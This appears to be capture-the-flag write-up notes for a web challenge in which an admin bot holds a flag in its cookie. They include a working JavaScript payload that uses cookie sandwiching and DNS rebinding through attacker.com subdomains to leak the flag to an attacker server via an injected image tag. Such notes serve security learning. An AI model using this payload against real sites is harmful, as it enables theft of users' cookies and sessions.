<aside> 💡
resp.headers["Content-Security-Policy"] = "default-src 'none'; img-src http: https:; style-src 'self';"
we can use image-src
</aside>
we can bypass check visit_url() in bot ⇒ we can make the bot visit our webpage.
Flag in cookie ⇒ we can dns rebinding, cookie sandwich. *.attacker.com
<script>
const sleep = t => new Promise(r => setTimeout(r, t));
(async ()=> {
const token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIyIiwiaWF0IjoxNzY4MDE3MTEwLCJleHAiOjE3NjgwMjQzMTB9.VBd77rx24B8UxtfiMNVuZKfo2lB8_T5zo5zxReUYXdU";
document.cookie=`session=${token};Domain=attacker.com;Path=/flag`;
let w1 = open("<http://localhost.attacker.com:5000/flag>");
document.cookie=`motd="%3Cimg%20src='//foobar.n.attacker.com/?v=;Domain=attacker.com;Path=/motd`;
await sleep(1000);
document.cookie=`z='%3E";Domain=attacker.com;Path=/`;
w2 = open("<http://localhost.attacker.com:5000/motd>");
})();
</script>
localhost.attacker.com ⇒ localhost
foobar.attacker.com ⇒ our server
Same as u1, but the flag in content html, which contains “ ‘ before the flag, so cant set to cookie. However we can change encoding to ISO-2022-JP, using meta tag.
And also we need to close the quote in ISO-2022-JP, so we use that in username.
Author solve script.
<aside> 💡
DNS REBINDING SETUP. https://www.intruder.io/research/we-hacked-ourselves-with-dns-rebinding
https://www.intruder.io/research/split-second-dns-rebinding-in-chrome-and-safari
</aside>
Script setup @crazyman